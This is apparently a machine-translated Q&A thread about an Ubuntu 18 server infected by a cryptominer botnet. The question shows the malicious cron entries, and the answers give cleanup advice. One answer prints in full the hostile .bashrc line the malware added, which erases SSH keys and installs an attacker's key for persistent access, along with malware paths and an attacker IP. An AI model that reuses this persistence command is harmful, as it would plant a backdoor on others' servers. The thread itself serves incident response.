Garip Cron Job, CPU Ubuntu 18 LTS Sunucusunun% 100'ünü kaplıyor


21

Tuhaf cron işlerini ortaya koymaya devam ediyorum ve ne yaptıkları hakkında hiçbir fikrim yok. Genellikle onları durdurmak için -9 öldürürüm. İşlemcimin% 100'ünü alıyorlar ve kontrol edene kadar günlerce çalışabiliyorlar. Bunun ne anlama geldiğini bilen var mı?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Ubuntu 18 LTS sunucusunu dün 7/24/2019 itibariyle tamamen güncel olarak kullanıyorum

GÜNCELLEŞTİRME

Tüm geri bildirimleri takdir ediyorum. Etkilenen tek şey işletim sistemi sürücüsü olduğu için tüm veri ve uygulama sürücülerinin bağlantısını kestim, en azından bu tür şeyleri doğru bir şekilde yaptım. Çok daha fazla güvenlik ve daha güvenli yöntemler ile tam bir yeniden inşayla gidiyorum.


8
.firefoxcatchemuhtemelen firefox ile ilgisi yok - bu sadece bir bitcoin madenci olabilir mi? Çalıştırılabilir dosyaları virustotal'a yüklemeyi deneyin.
Thom Wiggers

1
Bu crontab tarafından çalıştırılan dosyalar /root/.firefoxcatche/a/updve/root/.firefoxcatche/b/sync
Thom Wiggers

2
“Bunu yapmak için crontab'ı bulamıyorum” bu ne anlama geliyor? neden sudo crontab -eişe yaramazsa düzenlemek istemez? Fakat eğer bu yüklemediğiniz bir şifreleyici ise ... bunlar yeniden eklenecektir. "/Root/.firefoxcatche/a/upd" de ilk bakış, ne işe yarıyor?
Rinzwind

2
“Oraya ulaşmak için root olarak giriş yapmalı mıyım?” Bu, bir yöneticiden görmeyi beklemeyeceğim bir soru. Bundan sonra ne yaptığını gerçekten bilmen gerekiyor. Yönetici şifresini en kısa sürede değiştirin. Cron'da listelenen dosyaları inceleyin. Onları yok et.
Rinzwind

1
ama bu kadar basit ;-) 10+ google bulut örneği tutuyorum. Herhangi bir şey üzerinde bir acil durum planı ile yanlış olduğunu hayal edebiliyorum. Eğer böyle bir şey olursa, kök örneği imha eder, yeni bir tane oluşturur, veri diskini bir klona karşı tarar, farkları tarar ve sonra örneğe eklerdim. ve bu kişiyi tekrar olmasını önlemek için tuzağa düşürecek bir şey uygulayın. Benim durumumda
maaşım

Yanıtlar:


40

Makinenizin büyük olasılıkla bir şifreleme madencisi enfeksiyonu vardır. Güvenlik Merkezi ile Azure'da sanal makinenin Gerçek hayat algılamasında benzer dosya adlarını ve davranışlarını bildiren başka birini görebilirsiniz . Ayrıca bakınız Ubuntu Sunucumda virüs var ... Onu tespit ettim ama ondan kurtulamıyorum ... Reddit'te.

Bu makineye artık güvenemezsiniz ve yeniden kurmanız gerekir. Yedekleri geri yükleme konusunda dikkatli olun.


8
Katılıyorum. root şifresi bozuldu bu yüzden tekrar kurun ve yedeklemeye çok dikkat edin; orada da olabilir.
Rinzwind

9

Makinenize bir kripto madenci saldırısı geldi. Ayrıca geçmişte de benzer bir fidye yazılımı saldırısıyla karşılaştım ve veritabanım tehlikeye girdi. Makine için bir SQL dökümü aldım ve makineyi yeniden ürettim (makinem AWS EC2'de barındırılan bir VM olduğu için). Ayrıca makinenin güvenlik gruplarını SSH erişimini ve şifreleri değiştirmek için değiştirdim. Ayrıca her gün sorguları günlüğe kaydetmek ve S3'e aktarmak için günlüğe kaydetmeyi etkinleştirdim.


4

Aynısı bana da oldu ve dün fark ettim. Dosyayı kontrol ettim /var/log/syslogve bu IP (185.234.218.40) otomatik olarak cronjobs yürütüyor gibi görünüyordu.

Http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) adresinden kontrol ettim ve bazı raporları var. Bu dosyalar trojan tarafından düzenlendi:

  • Bashrc
  • .ssh / authorized_keys

Bunu .bashrc(bash her açıldığında yürütülür) sonunda buldum :

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Bu sizin siliyor authorized_keysşifre olmadan bağlanmasına izin verilen SSH anahtarlarının bir listesi dosyası. Sonra saldırganın SSH anahtarını ekler:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Ayrıca, bu klasörü buldum:, /tmp/.X13-unix/.rsynctüm kötü amaçlı yazılımın bulunduğu yer. Büyük /tmp/.X13-unix/.rsync/c/ipolasılıkla diğer kurbanlar veya düğüm sunucuları olan 70 000 IP adresi içeren bir dosya bile buldum .

2 çözüm var: A:

  • 22 numaralı bağlantı noktası ve gerekli bulduğunuz diğerleri dışındaki tüm giden bağlantıları engelleyen ve X başarısız parola girişiminden sonra bir IP adresini yasaklayan bir program olan fail2ban'ı engelleyen bir güvenlik duvarı ekleyin

  • Tüm cron işlerini öldür: ps aux | grep cronsonra ortaya çıkan PID'yi öldür

  • Parolanızı güvenli bir parola ile değiştirin.

B:

  • İhtiyacınız olan veya istediğiniz tüm dosyaları veya klasörleri yedekleyin

  • Sunucuyu sıfırlayın ve Ubuntu'yu yeniden yükleyin veya doğrudan yeni bir damlacık oluşturun

    Thom Wiggers'ın dediği gibi, kesinlikle bir bitcoin madenciliği botnetinin bir parçasısınız ve sunucunuz bir arka kapıya sahip . Arka kapı, burada bulunan bir dosyayı kullanan bir perl istisnası kullanır:, /tmp/.X13-unix/.rsync/b/runbunu içeren ( https://pastebin.com/ceP2jsUy )

Bulduğum en şüpheli klasörler şunlardı:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (düzenlendi)

  • ~/.firefoxcatche

Son olarak, Perl Backdoor ile ilgili bir makale var: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Umarım bunu faydalı buluyorsunuz.


Os sürücüyü silip yeniden
yükledim

Evet, bu iyi bir çözüm :)
Oqhax

Bu çok yararlı bir cevaptı - ~/.bashrcdüzeltilmiş gerçeği yakaladığınız için teşekkür ederiz . rsyncSorunu çıkarmak zorunda olduğum sahtekarlığı öldürürken buldum kill -9 <pid>.
Benny Hill
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.